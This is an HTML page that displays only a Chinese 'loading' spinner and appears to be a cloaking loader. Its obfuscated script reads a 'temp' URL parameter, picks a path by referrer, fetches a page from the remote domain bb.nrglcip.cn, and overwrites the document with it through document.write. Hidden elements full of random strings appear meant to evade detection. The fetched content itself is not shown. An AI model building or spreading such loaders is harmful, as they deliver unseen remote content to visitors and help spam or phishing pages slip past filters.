<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .sLnPJ1 {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .sLnPJ1 .rAfkfiuCf {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .sLnPJ1 .content {
            line-height: 50px;
            text-align: center
        }

        .sLnPJ1 .img {
            width: 100%
        }

        .sLnPJ1 .sxvUWzfy4K {
            text-align: center
        }

        .sLnPJ1 .sxvUWzfy4K span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .sLnPJ1 .sxvUWzfy4K span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .sLnPJ1 .sxvUWzfy4K span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .sLnPJ1 .sxvUWzfy4K span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .sLnPJ1 .sxvUWzfy4K span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .sLnPJ1 .sxvUWzfy4K span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .sLnPJ1 .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function wbLEHkx1CRGc(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var TiNIT8 = wbLEHkx1CRGc('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ TiNIT8 +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ TiNIT8 +".html?a=share";
		}
		
        B2U45YZ6t=url+"#"+new Date().getTime();
        B2U45YZ6t && function() {
            $.get(B2U45YZ6t, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<ul style='display:none' >svSwYBdwQIn4NzI8PtAWuc2kkaPFRL0o857VRBByYrfRqRs06nZGuCr0irAwMaCUvQw9viS49zxZYzD</ul>
<span style='display:none'>jM56eIpKgBspZfgU4zvzuz921jJWR0b4vJgEzzUXKX1ZnpyN492YnH8JLKesYhNzQjA3QnPxGIC18AKnNHOxnXju0HSxkBTgUvV</span>
<img  src='' style='display:none'>
<li style='display:none' >q2q5TqABiX5mdnMhqsOzH30Xb3nz8b2Vzo2L1zje0OSUVuUt657aSMN7vF1iO8akzoqnlcJ24lMsLoSsfs0aWTPsR2aHm</li>
<img  src='' style='display:none'><div class="sLnPJ1">
    <div class="rAfkfiuCf">
        <div class="sxvUWzfy4K">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<p  style='display:none'>BNj6KvKsxuAXf</p>
<a  href='#' style='display:none'>J5Jjol4qXIFcm6AkfOXWb4PcDsZHDdNO5Ze1nSP0mBiAADeYhL4uo7eZuiSrKhjblSFpRR2bx980HGHXM14krLWsiX3ZFtW1ppS</a>
<img  src='' style='display:none'>
<span style='display:none'>yOtWofV46S1NrWycrDTHXmBCC8Oc1OPAe8wwWQ6yxAFVkZ4ACRs2rkYYV8AyLd99eHCiMMLQ6OoMUiDG4nl93C</span>
<b style='display:none' >qPlUF9buDk3vVBqGPXzpOuH3</b>
<img  src='' style='display:none'>
<img  src='' style='display:none'></body>
</html>